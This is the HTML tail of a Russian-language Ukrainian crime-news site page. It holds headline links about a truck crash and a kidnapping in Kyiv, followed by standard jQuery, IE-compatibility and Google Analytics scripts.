	<strong title="На Тернопольщине фура разбилась вдребезги"><a href="http://hronika.info/kriminal/293399-na-ternopolschine-fura-razbilas-vdrebezgi.html">На Тернопольщине фура разбилась вдребезги</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">31.01-19:53</span>
	<strong title="В Киеве похитили двух братьев-иностранцев"><a href="http://hronika.info/kriminal/293391-v-kieve-pohitili-dvuh-bratev-inostrancev.html">В Киеве похитили двух братьев-иностранцев</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">31.01-19:29</span>
	<strong title="Похищение со стрельбой в Киеве: появились подробности"><a href="http://hronika.info/kriminal/293387-pohischenie-so-strelboy-v-kieve-poyavilis-podrobnosti.html">Похищение со стрельбой в Киеве: появились</a></strong>			
</div>


















            <hr />»
            <a href="/">Перейти на главную</a>
          </div>
        </div>
      </div>
-->
      
    <div id="fb-root"></div>
      <script type="text/javascript">	
$(document).ready(function(){$("#newstab2, #listalka_tab, #rightbl_tab, #ax_popular_obs, #ax_popular_comp").easyTabs({defaultContent:1})});$(document).ready(function(){$("#slider3").tinycarousel({pager:true,interval:true})});$(document).ready(function(){$("#dim7").css("height",$(document).height());$(".alert7").click(function(){$("#dim7").fadeIn();return false});$(".close7").click(function(){$(".news-bot-show").remove();return false})});$(window).bind("resize",function(){$("#dim7").css("height",$(window).height())});
$(document).ready(function(){$("div.short_2").addClass("alt");$("div.short_2_clr:even").addClass("alt")});
    </script>
<div id="fb-root"></div>

	<script type="text/javascript" src="/templates/hronika/js/libs.js"></script>
	<script type="text/javascript" src="/templates/hronika/js/orating_pack.js"></script>
        <!--[if IE]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->
	<!--[if IE 8]><link href="/templates/hronika/css/ie8.css"  rel="stylesheet" media="all" /><![endif]-->
<script>
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date;a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create","UA-48298212-1","hronika.info");ga("send","pageview");
</script>


</body>

</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
